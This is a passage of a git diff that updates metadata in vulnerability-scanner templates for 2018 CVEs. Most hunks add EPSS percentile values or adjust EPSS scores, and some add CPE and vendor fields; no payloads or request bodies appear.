+ epss-percentile: 0.79859
metadata:
max-request: 1
shodan-query: http.html:"sympa"
diff --git a/http/cves/2018/CVE-2018-1000856.yaml b/http/cves/2018/CVE-2018-1000856.yaml
index bd398df9a8..736acb1182 100644
--- a/http/cves/2018/CVE-2018-1000856.yaml
+++ b/http/cves/2018/CVE-2018-1000856.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00101
cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:*
+ epss-percentile: 0.40768
metadata:
max-request: 3
verified: true
diff --git a/http/cves/2018/CVE-2018-1000861.yaml b/http/cves/2018/CVE-2018-1000861.yaml
index a6151d39bc..878b09b65d 100644
--- a/http/cves/2018/CVE-2018-1000861.yaml
+++ b/http/cves/2018/CVE-2018-1000861.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-502
epss-score: 0.97412
cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:*
+ epss-percentile: 0.99884
metadata:
max-request: 1
vendor: jenkins
diff --git a/http/cves/2018/CVE-2018-10093.yaml b/http/cves/2018/CVE-2018-10093.yaml
index bab9584516..c24aac42b2 100644
--- a/http/cves/2018/CVE-2018-10093.yaml
+++ b/http/cves/2018/CVE-2018-10093.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-862
epss-score: 0.06287
cpe: cpe:2.3:o:audiocodes:420hd_ip_phone_firmware:2.2.12.126:*:*:*:*:*:*:*
+ epss-percentile: 0.92688
metadata:
max-request: 1
vendor: audiocodes
diff --git a/http/cves/2018/CVE-2018-10095.yaml b/http/cves/2018/CVE-2018-10095.yaml
index dcbcdc6307..f8151245f8 100644
--- a/http/cves/2018/CVE-2018-10095.yaml
+++ b/http/cves/2018/CVE-2018-10095.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-79
epss-score: 0.95296
cpe: cpe:2.3:a:dolibarr:dolibarr:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99069
metadata:
max-request: 1
vendor: dolibarr
diff --git a/http/cves/2018/CVE-2018-10141.yaml b/http/cves/2018/CVE-2018-10141.yaml
index c7b4fd2fad..a3ad528525 100644
--- a/http/cves/2018/CVE-2018-10141.yaml
+++ b/http/cves/2018/CVE-2018-10141.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00126
cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*
+ epss-percentile: 0.46484
metadata:
max-request: 1
vendor: paloaltonetworks
diff --git a/http/cves/2018/CVE-2018-10201.yaml b/http/cves/2018/CVE-2018-10201.yaml
index 4a6658a245..02b2f9a6b9 100644
--- a/http/cves/2018/CVE-2018-10201.yaml
+++ b/http/cves/2018/CVE-2018-10201.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2018-10201
cwe-id: CWE-22
- epss-score: 0.07642
+ epss-score: 0.063
cpe: cpe:2.3:a:ncomputing:vspace_pro:10:*:*:*:*:*:*:*
+ epss-percentile: 0.92695
metadata:
max-request: 4
vendor: ncomputing
diff --git a/http/cves/2018/CVE-2018-10230.yaml b/http/cves/2018/CVE-2018-10230.yaml
index e2ad284c7d..026875d4a6 100644
--- a/http/cves/2018/CVE-2018-10230.yaml
+++ b/http/cves/2018/CVE-2018-10230.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00122
cpe: cpe:2.3:a:zend:zend_server:*:*:*:*:*:*:*:*
+ epss-percentile: 0.45743
metadata:
max-request: 1
vendor: zend
diff --git a/http/cves/2018/CVE-2018-10562.yaml b/http/cves/2018/CVE-2018-10562.yaml
index 8c4b6802f1..b30d69e1e3 100644
--- a/http/cves/2018/CVE-2018-10562.yaml
+++ b/http/cves/2018/CVE-2018-10562.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2018-10562
cwe-id: CWE-78
- epss-score: 0.97572
+ epss-score: 0.97576
cpe: cpe:2.3:o:dasannetworks:gpon_router_firmware:-:*:*:*:*:*:*:*
+ epss-percentile: 0.99999
metadata:
max-request: 2
vendor: dasannetworks
diff --git a/http/cves/2018/CVE-2018-10822.yaml b/http/cves/2018/CVE-2018-10822.yaml
index 4027b5e6d1..67ec795841 100644
--- a/http/cves/2018/CVE-2018-10822.yaml
+++ b/http/cves/2018/CVE-2018-10822.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.17386
cpe: cpe:2.3:o:dlink:dwr-116_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.95419
metadata:
max-request: 1
vendor: dlink
diff --git a/http/cves/2018/CVE-2018-10823.yaml b/http/cves/2018/CVE-2018-10823.yaml
index a617e33af6..cf60450f35 100644
--- a/http/cves/2018/CVE-2018-10823.yaml
+++ b/http/cves/2018/CVE-2018-10823.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-78
epss-score: 0.96863
cpe: cpe:2.3:o:dlink:dwr-116_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99564
metadata:
max-request: 1
vendor: dlink
diff --git a/http/cves/2018/CVE-2018-10956.yaml b/http/cves/2018/CVE-2018-10956.yaml
index 9edb1bcbbd..297afc058a 100644
--- a/http/cves/2018/CVE-2018-10956.yaml
+++ b/http/cves/2018/CVE-2018-10956.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2018-10956
cwe-id: CWE-22
- epss-score: 0.68675
+ epss-score: 0.65072
cpe: cpe:2.3:a:ipconfigure:orchid_core_vms:2.0.5:*:*:*:*:*:*:*
+ epss-percentile: 0.97442
metadata:
max-request: 1
shodan-query: http.title:"Orchid Core VMS"
diff --git a/http/cves/2018/CVE-2018-11227.yaml b/http/cves/2018/CVE-2018-11227.yaml
index c8c93e743f..7916f6ab2a 100644
--- a/http/cves/2018/CVE-2018-11227.yaml
+++ b/http/cves/2018/CVE-2018-11227.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.02667
cpe: cpe:2.3:a:monstra:monstra_cms:*:*:*:*:*:*:*:*
+ epss-percentile: 0.89064
metadata:
max-request: 1
shodan-query: http.favicon.hash:419828698
diff --git a/http/cves/2018/CVE-2018-11231.yaml b/http/cves/2018/CVE-2018-11231.yaml
index 41eb8a6e76..a44352b3bc 100644
--- a/http/cves/2018/CVE-2018-11231.yaml
+++ b/http/cves/2018/CVE-2018-11231.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-89
epss-score: 0.00903
cpe: cpe:2.3:a:divido:divido:-:*:*:*:*:opencart:*:*
+ epss-percentile: 0.80727
metadata:
max-request: 1
framework: opencart
diff --git a/http/cves/2018/CVE-2018-11409.yaml b/http/cves/2018/CVE-2018-11409.yaml
index 23a12a6565..813b9715e1 100644
--- a/http/cves/2018/CVE-2018-11409.yaml
+++ b/http/cves/2018/CVE-2018-11409.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 5.3
cve-id: CVE-2018-11409
cwe-id: CWE-200
- epss-score: 0.95561
+ epss-score: 0.95758
cpe: cpe:2.3:a:splunk:splunk:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99181
metadata:
max-request: 2
vendor: splunk
diff --git a/http/cves/2018/CVE-2018-11473.yaml b/http/cves/2018/CVE-2018-11473.yaml
index 3e263f23e5..909e83933c 100644
--- a/http/cves/2018/CVE-2018-11473.yaml
+++ b/http/cves/2018/CVE-2018-11473.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00097
cpe: cpe:2.3:a:monstra:monstra:3.0.4:*:*:*:*:*:*:*
+ epss-percentile: 0.39898
metadata:
max-request: 2
shodan-query: http.favicon.hash:419828698
diff --git a/http/cves/2018/CVE-2018-11709.yaml b/http/cves/2018/CVE-2018-11709.yaml
index 0706563a6d..5fe2b73bc0 100644
--- a/http/cves/2018/CVE-2018-11709.yaml
+++ b/http/cves/2018/CVE-2018-11709.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00151
cpe: cpe:2.3:a:gvectors:wpforo_forum:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.50613
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2018/CVE-2018-11759.yaml b/http/cves/2018/CVE-2018-11759.yaml
index f707d7dbda..7d08ad065d 100644
--- a/http/cves/2018/CVE-2018-11759.yaml
+++ b/http/cves/2018/CVE-2018-11759.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2018-11759
cwe-id: CWE-22
- epss-score: 0.97485
+ epss-score: 0.97443
cpe: cpe:2.3:a:apache:tomcat_jk_connector:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99916
metadata:
max-request: 2
shodan-query: title:"Apache Tomcat"
diff --git a/http/cves/2018/CVE-2018-11776.yaml b/http/cves/2018/CVE-2018-11776.yaml
index 7e630fd38e..8c661eb508 100644
--- a/http/cves/2018/CVE-2018-11776.yaml
+++ b/http/cves/2018/CVE-2018-11776.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 8.1
cve-id: CVE-2018-11776
cwe-id: CWE-20
- epss-score: 0.97562
+ epss-score: 0.97557
cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99995
metadata:
max-request: 1
vendor: apache
diff --git a/http/cves/2018/CVE-2018-11784.yaml b/http/cves/2018/CVE-2018-11784.yaml
index ee42904d71..af52b2ed44 100644
--- a/http/cves/2018/CVE-2018-11784.yaml
+++ b/http/cves/2018/CVE-2018-11784.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 4.3
cve-id: CVE-2018-11784
cwe-id: CWE-601
- epss-score: 0.9667
+ epss-score: 0.96524
cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99413
metadata:
max-request: 1
shodan-query: title:"Apache Tomcat"
diff --git a/http/cves/2018/CVE-2018-12031.yaml b/http/cves/2018/CVE-2018-12031.yaml
index b287150ce1..27d6fd7b53 100644
--- a/http/cves/2018/CVE-2018-12031.yaml
+++ b/http/cves/2018/CVE-2018-12031.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-22
epss-score: 0.01411
cpe: cpe:2.3:a:eaton:intelligent_power_manager:1.6:*:*:*:*:*:*:*
+ epss-percentile: 0.84811
metadata:
max-request: 2
vendor: eaton
diff --git a/http/cves/2018/CVE-2018-12054.yaml b/http/cves/2018/CVE-2018-12054.yaml
index 17efc68af9..1c99b61b97 100644
--- a/http/cves/2018/CVE-2018-12054.yaml
+++ b/http/cves/2018/CVE-2018-12054.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2018-12054
cwe-id: CWE-22
- epss-score: 0.55866
+ epss-score: 0.43824
cpe: cpe:2.3:a:schools_alert_management_script_project:schools_alert_management_script:-:*:*:*:*:*:*:*
+ epss-percentile: 0.96879
metadata:
max-request: 1
vendor: schools_alert_management_script_project
diff --git a/http/cves/2018/CVE-2018-1207.yaml b/http/cves/2018/CVE-2018-1207.yaml
index 5caa81ff85..98f218b5df 100644
--- a/http/cves/2018/CVE-2018-1207.yaml
+++ b/http/cves/2018/CVE-2018-1207.yaml
@@ -19,8 +19,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2018-1207
cwe-id: CWE-94
- epss-score: 0.03417
+ epss-score: 0.01778
cpe: cpe:2.3:a:dell:emc_idrac7:*:*:*:*:*:*:*:*
+ epss-percentile: 0.86487
metadata:
max-request: 1
vendor: dell
diff --git a/http/cves/2018/CVE-2018-12095.yaml b/http/cves/2018/CVE-2018-12095.yaml
index b843f7ef82..627c331bad 100644
--- a/http/cves/2018/CVE-2018-12095.yaml
+++ b/http/cves/2018/CVE-2018-12095.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00407
cpe: cpe:2.3:a:oecms_project:oecms:3.1:*:*:*:*:*:*:*
+ epss-percentile: 0.70495
metadata:
max-request: 1
vendor: oecms_project
diff --git a/http/cves/2018/CVE-2018-12296.yaml b/http/cves/2018/CVE-2018-12296.yaml
index 1b513a24fa..1636f9a33f 100644
--- a/http/cves/2018/CVE-2018-12296.yaml
+++ b/http/cves/2018/CVE-2018-12296.yaml
@@ -13,8 +13,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2018-12296
cwe-id: CWE-732
- epss-score: 0.01284
+ epss-score: 0.01503
cpe: cpe:2.3:o:seagate:nas_os:4.3.15.1:*:*:*:*:*:*:*
+ epss-percentile: 0.85298
metadata:
max-request: 1
vendor: seagate
diff --git a/http/cves/2018/CVE-2018-12300.yaml b/http/cves/2018/CVE-2018-12300.yaml
index 124fa33703..92f7e22058 100644
--- a/http/cves/2018/CVE-2018-12300.yaml
+++ b/http/cves/2018/CVE-2018-12300.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-601
epss-score: 0.00118
cpe: cpe:2.3:o:seagate:nas_os:4.3.15.1:*:*:*:*:*:*:*
+ epss-percentile: 0.45103
metadata:
max-request: 1
vendor: seagate
diff --git a/http/cves/2018/CVE-2018-12613.yaml b/http/cves/2018/CVE-2018-12613.yaml
index a9ea137c63..f27ae5be55 100644
--- a/http/cves/2018/CVE-2018-12613.yaml
+++ b/http/cves/2018/CVE-2018-12613.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 8.8
cve-id: CVE-2018-12613
cwe-id: CWE-287
- epss-score: 0.97501
+ epss-score: 0.97383
cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99864
metadata:
max-request: 1
vendor: phpmyadmin
diff --git a/http/cves/2018/CVE-2018-12634.yaml b/http/cves/2018/CVE-2018-12634.yaml
index 5515f21043..794f558ad9 100644
--- a/http/cves/2018/CVE-2018-12634.yaml
+++ b/http/cves/2018/CVE-2018-12634.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2018-12634
cwe-id: CWE-200
- epss-score: 0.96198
+ epss-score: 0.95864
cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99211
metadata:
max-request: 1
vendor: circontrol
diff --git a/http/cves/2018/CVE-2018-12675.yaml b/http/cves/2018/CVE-2018-12675.yaml
index 1cfa7afed7..769964b0ef 100644
--- a/http/cves/2018/CVE-2018-12675.yaml
+++ b/http/cves/2018/CVE-2018-12675.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-601
epss-score: 0.00118
cpe: cpe:2.3:o:sv3c:h.264_poe_ip_camera_firmware:v2.3.4.2103-s50-ntd-b20170508b:*:*:*:*:*:*:*
+ epss-percentile: 0.45103
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2018/CVE-2018-1271.yaml b/http/cves/2018/CVE-2018-1271.yaml
index 9618696e9a..eb3fd429bb 100644
--- a/http/cves/2018/CVE-2018-1271.yaml
+++ b/http/cves/2018/CVE-2018-1271.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 5.9
cve-id: CVE-2018-1271
cwe-id: CWE-22
- epss-score: 0.00986
+ epss-score: 0.00803
cpe: cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*
+ epss-percentile: 0.79507
metadata:
max-request: 2
vendor: vmware
diff --git a/http/cves/2018/CVE-2018-1273.yaml b/http/cves/2018/CVE-2018-1273.yaml
index c2f4110752..cf16f3780f 100644
--- a/http/cves/2018/CVE-2018-1273.yaml
+++ b/http/cves/2018/CVE-2018-1273.yaml
@@ -20,9 +20,10 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-1273
- cwe-id: CWE-20,CWE-94
+ cwe-id: CWE-94,CWE-20
epss-score: 0.97498
cpe: cpe:2.3:a:pivotal_software:spring_data_commons:*:*:*:*:*:*:*:*
+ epss-percentile: 0.9996
metadata:
max-request: 2
vendor: pivotal_software
diff --git a/http/cves/2018/CVE-2018-12909.yaml b/http/cves/2018/CVE-2018-12909.yaml
index 69c672ddcf..bbc8c61928 100644
--- a/http/cves/2018/CVE-2018-12909.yaml
+++ b/http/cves/2018/CVE-2018-12909.yaml
@@ -11,14 +11,19 @@ info:
- https://github.com/jokkedk/webgrind/issues/112
- https://nvd.nist.gov/vuln/detail/CVE-2018-12909
classification:
- cve-id: CVE-2018-12909
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
+ cve-id: CVE-2018-12909
cwe-id: CWE-22
+ epss-score: 0.01119
+ cpe: cpe:2.3:a:webgrind_project:webgrind:1.5.0:*:*:*:*:*:*:*
+ epss-percentile: 0.82786
metadata:
max-request: 1
verified: true
fofa-query: app="Webgrind"
+ vendor: webgrind_project
+ product: webgrind
tags: cve,cve2018,lfi,webgrind
http:
diff --git a/http/cves/2018/CVE-2018-12998.yaml b/http/cves/2018/CVE-2018-12998.yaml
index 5060ae2c55..8f2258a9d4 100644
--- a/http/cves/2018/CVE-2018-12998.yaml
+++ b/http/cves/2018/CVE-2018-12998.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2018-12998
cwe-id: CWE-79
- epss-score: 0.97111
+ epss-score: 0.97052
cpe: cpe:2.3:a:zohocorp:firewall_analyzer:-:*:*:*:*:*:*:*
+ epss-percentile: 0.99648
metadata:
max-request: 1
vendor: zohocorp
diff --git a/http/cves/2018/CVE-2018-1335.yaml b/http/cves/2018/CVE-2018-1335.yaml
index 3dfaa27691..31b58ef8eb 100644
--- a/http/cves/2018/CVE-2018-1335.yaml
+++ b/http/cves/2018/CVE-2018-1335.yaml
@@ -16,8 +16,9 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.1
cve-id: CVE-2018-1335
- epss-score: 0.97341
+ epss-score: 0.97218
cpe: cpe:2.3:a:apache:tika:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99743
metadata:
max-request: 1
vendor: apache
diff --git a/http/cves/2018/CVE-2018-13379.yaml b/http/cves/2018/CVE-2018-13379.yaml
index 2c04a2b4a0..37557205a0 100644
--- a/http/cves/2018/CVE-2018-13379.yaml
+++ b/http/cves/2018/CVE-2018-13379.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2018-13379
cwe-id: CWE-22
- epss-score: 0.97492
+ epss-score: 0.97486
cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99951
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2018/CVE-2018-13380.yaml b/http/cves/2018/CVE-2018-13380.yaml
index b794df3558..219b1eb3e2 100644
--- a/http/cves/2018/CVE-2018-13380.yaml
+++ b/http/cves/2018/CVE-2018-13380.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00122
cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*
+ epss-percentile: 0.45743
metadata:
max-request: 2
vendor: fortinet
diff --git a/http/cves/2018/CVE-2018-13980.yaml b/http/cves/2018/CVE-2018-13980.yaml
index 387d6a8bf6..261d2ad26d 100644
--- a/http/cves/2018/CVE-2018-13980.yaml
+++ b/http/cves/2018/CVE-2018-13980.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.0018
cpe: cpe:2.3:a:zeta-producer:zeta_producer:*:*:*:*:*:*:*:*
+ epss-percentile: 0.5447
metadata:
max-request: 1
vendor: zeta-producer
diff --git a/http/cves/2018/CVE-2018-14013.yaml b/http/cves/2018/CVE-2018-14013.yaml
index 763aef53de..c28957583e 100644
--- a/http/cves/2018/CVE-2018-14013.yaml
+++ b/http/cves/2018/CVE-2018-14013.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2018-14013
cwe-id: CWE-79
- epss-score: 0.00533
+ epss-score: 0.00512
cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:*
+ epss-percentile: 0.73663
metadata:
max-request: 1
vendor: synacor
diff --git a/http/cves/2018/CVE-2018-14064.yaml b/http/cves/2018/CVE-2018-14064.yaml
index 79f4242e5c..8b65835d54 100644
--- a/http/cves/2018/CVE-2018-14064.yaml
+++ b/http/cves/2018/CVE-2018-14064.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-22
epss-score: 0.28372
cpe: cpe:2.3:o:velotismart_project:velotismart_wifi_firmware:b-380:*:*:*:*:*:*:*
+ epss-percentile: 0.96243
metadata:
max-request: 1
vendor: velotismart_project
diff --git a/http/cves/2018/CVE-2018-14474.yaml b/http/cves/2018/CVE-2018-14474.yaml
index 9c971abb46..26f9b3ef3a 100644
--- a/http/cves/2018/CVE-2018-14474.yaml
+++ b/http/cves/2018/CVE-2018-14474.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-601
epss-score: 0.00068
cpe: cpe:2.3:a:goodoldweb:orange_forum:1.4.0:*:*:*:*:*:*:*
+ epss-percentile: 0.28011
metadata:
max-request: 2
vendor: goodoldweb
diff --git a/http/cves/2018/CVE-2018-14574.yaml b/http/cves/2018/CVE-2018-14574.yaml
index 929c5828ad..381ffabd92 100644
--- a/http/cves/2018/CVE-2018-14574.yaml
+++ b/http/cves/2018/CVE-2018-14574.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2018-14574
cwe-id: CWE-601
- epss-score: 0.00962
+ epss-score: 0.01218
cpe: cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:*
+ epss-percentile: 0.83586
metadata:
max-request: 1
vendor: djangoproject
diff --git a/http/cves/2018/CVE-2018-14728.yaml b/http/cves/2018/CVE-2018-14728.yaml
index 0345e2dd59..b773921bb5 100644
--- a/http/cves/2018/CVE-2018-14728.yaml
+++ b/http/cves/2018/CVE-2018-14728.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2018-14728
cwe-id: CWE-918
- epss-score: 0.96872
+ epss-score: 0.96926
cpe: cpe:2.3:a:tecrail:responsive_filemanager:9.13.1:*:*:*:*:*:*:*
+ epss-percentile: 0.99601
metadata:
max-request: 1
vendor: tecrail
diff --git a/http/cves/2018/CVE-2018-14912.yaml b/http/cves/2018/CVE-2018-14912.yaml
index b953b2716f..8e756dbc09 100644
--- a/http/cves/2018/CVE-2018-14912.yaml
+++ b/http/cves/2018/CVE-2018-14912.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2018-14912
cwe-id: CWE-22
- epss-score: 0.97328
+ epss-score: 0.97246
cpe: cpe:2.3:a:cgit_project:cgit:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99761
metadata:
max-request: 1
vendor: cgit_project
diff --git a/http/cves/2018/CVE-2018-14916.yaml b/http/cves/2018/CVE-2018-14916.yaml
index ec3e53d1fb..38c34817a5 100644
--- a/http/cves/2018/CVE-2018-14916.yaml
+++ b/http/cves/2018/CVE-2018-14916.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-732
epss-score: 0.00483
cpe: cpe:2.3:o:loytec:lgate-902_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.72875
metadata:
max-request: 1
vendor: loytec
diff --git a/http/cves/2018/CVE-2018-14918.yaml b/http/cves/2018/CVE-2018-14918.yaml
index 421ee00d8f..aba7875ad8 100644
--- a/http/cves/2018/CVE-2018-14918.yaml
+++ b/http/cves/2018/CVE-2018-14918.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.4378
cpe: cpe:2.3:o:loytec:lgate-902_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.96878
metadata:
max-request: 1
shodan-query: http.html:"LGATE-902"
diff --git a/http/cves/2018/CVE-2018-14931.yaml b/http/cves/2018/CVE-2018-14931.yaml
index d9cf3f4c5a..2808fb78ec 100644
--- a/http/cves/2018/CVE-2018-14931.yaml
+++ b/http/cves/2018/CVE-2018-14931.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-601
epss-score: 0.00118
cpe: cpe:2.3:a:polarisft:intellect_core_banking:9.7.1:*:*:*:*:*:*:*
+ epss-percentile: 0.45103
metadata:
max-request: 1
vendor: polarisft
diff --git a/http/cves/2018/CVE-2018-15138.yaml b/http/cves/2018/CVE-2018-15138.yaml
index b4aa70e2de..cf9de2c15d 100644
--- a/http/cves/2018/CVE-2018-15138.yaml
+++ b/http/cves/2018/CVE-2018-15138.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2018-15138
cwe-id: CWE-22
- epss-score: 0.31973
+ epss-score: 0.34955
cpe: cpe:2.3:a:ericssonlg:ipecs_nms:30m-2.3gn:*:*:*:*:*:*:*
+ epss-percentile: 0.96565
metadata:
max-request: 2
vendor: ericssonlg
diff --git a/http/cves/2018/CVE-2018-15517.yaml b/http/cves/2018/CVE-2018-15517.yaml
index ddda32c21c..408ab6690b 100644
--- a/http/cves/2018/CVE-2018-15517.yaml
+++ b/http/cves/2018/CVE-2018-15517.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-918
epss-score: 0.01414
cpe: cpe:2.3:a:dlink:central_wifimanager:1.03:r0098:*:*:*:*:*:*
+ epss-percentile: 0.84824
metadata:
max-request: 1
vendor: dlink
diff --git a/http/cves/2018/CVE-2018-15535.yaml b/http/cves/2018/CVE-2018-15535.yaml
index ec4c24bbfd..2264a27770 100644
--- a/http/cves/2018/CVE-2018-15535.yaml
+++ b/http/cves/2018/CVE-2018-15535.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2018-15535
cwe-id: CWE-22
- epss-score: 0.9713
+ epss-score: 0.97149
cpe: cpe:2.3:a:tecrail:responsive_filemanager:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99695
metadata:
max-request: 1
vendor: tecrail
diff --git a/http/cves/2018/CVE-2018-15745.yaml b/http/cves/2018/CVE-2018-15745.yaml
index 06225dbd1d..b39ec0cb38 100644
--- a/http/cves/2018/CVE-2018-15745.yaml
+++ b/http/cves/2018/CVE-2018-15745.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2018-15745
cwe-id: CWE-22
- epss-score: 0.96738
+ epss-score: 0.9654
cpe: cpe:2.3:a:argussurveillance:dvr:4.0.0.0:*:*:*:*:*:*:*
+ epss-percentile: 0.99425
metadata:
max-request: 1
vendor: argussurveillance
diff --git a/http/cves/2018/CVE-2018-15961.yaml b/http/cves/2018/CVE-2018-15961.yaml
index dd68e261cf..13eae1f356 100644
--- a/http/cves/2018/CVE-2018-15961.yaml
+++ b/http/cves/2018/CVE-2018-15961.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2018-15961
cwe-id: CWE-434
- epss-score: 0.97474
+ epss-score: 0.97453
cpe: cpe:2.3:a:adobe:coldfusion:11.0:-:*:*:*:*:*:*
+ epss-percentile: 0.99925
metadata:
max-request: 2
shodan-query: http.component:"Adobe ColdFusion"
diff --git a/http/cves/2018/CVE-2018-16059.yaml b/http/cves/2018/CVE-2018-16059.yaml
index 3bdf2ccf68..bf947f6d07 100644
--- a/http/cves/2018/CVE-2018-16059.yaml
+++ b/http/cves/2018/CVE-2018-16059.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 5.3
cve-id: CVE-2018-16059
cwe-id: CWE-22
- epss-score: 0.64355
+ epss-score: 0.60231
cpe: cpe:2.3:o:endress:wirelesshart_fieldgate_swg70_firmware:3.00.07:*:*:*:*:*:*:*
+ epss-percentile: 0.97328
metadata:
max-request: 1
vendor: endress
diff --git a/http/cves/2018/CVE-2018-16133.yaml b/http/cves/2018/CVE-2018-16133.yaml
index 4e63f521f2..8cc1f06d94 100644
--- a/http/cves/2018/CVE-2018-16133.yaml
+++ b/http/cves/2018/CVE-2018-16133.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 5.3
cve-id: CVE-2018-16133
cwe-id: CWE-22
- epss-score: 0.07059
+ epss-score: 0.11636
cpe: cpe:2.3:a:cybrotech:cybrohttpserver:1.0.3:*:*:*:*:*:*:*
+ epss-percentile: 0.94538
metadata:
max-request: 1
vendor: cybrotech
diff --git a/http/cves/2018/CVE-2018-16139.yaml b/http/cves/2018/CVE-2018-16139.yaml
index e21bbe5fb1..593552d8be 100644
--- a/http/cves/2018/CVE-2018-16139.yaml
+++ b/http/cves/2018/CVE-2018-16139.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00135
cpe: cpe:2.3:a:bibliosoft:bibliopac:2008:*:*:*:*:*:*:*
+ epss-percentile: 0.47998
metadata:
max-request: 1
shodan-query: title:"Bibliopac"
diff --git a/http/cves/2018/CVE-2018-16159.yaml b/http/cves/2018/CVE-2018-16159.yaml
index f94ff71fc5..e338ebb0d4 100644
--- a/http/cves/2018/CVE-2018-16159.yaml
+++ b/http/cves/2018/CVE-2018-16159.yaml
@@ -18,8 +18,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2018-16159
cwe-id: CWE-89
- epss-score: 0.01316
+ epss-score: 0.01247
cpe: cpe:2.3:a:codemenschen:gift_vouchers:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.83832
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2018/CVE-2018-16167.yaml b/http/cves/2018/CVE-2018-16167.yaml
index 7e81b077af..006537a22d 100644
